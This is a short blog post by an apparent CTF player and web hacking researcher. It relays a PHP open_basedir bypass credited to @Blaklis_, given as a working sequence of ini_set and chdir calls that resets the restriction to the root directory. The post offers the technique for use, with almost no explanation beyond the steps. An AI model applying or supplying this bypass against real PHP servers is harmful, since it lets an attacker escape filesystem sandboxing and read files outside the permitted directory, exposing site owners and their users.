Awesome PHP open_basedir bypass

2019-04-28   |   by munsiwoo

Here is an awesome PHP open_basedir bypass by @Blaklis_

You are open_basedir'ed to /var/www/html
Change into a sub-directory.
ini_set('open_basedir', '..')
chdir('..');chdir('..');chdir('..');....
ini_set('open_basedir','/')
open_basedir is now set to /, enjoy

 
원문 : https://twitter.com/Blaklis_

About Post Author

munsiwoo

CTFer, Web hacking researcher

Leave Your Comment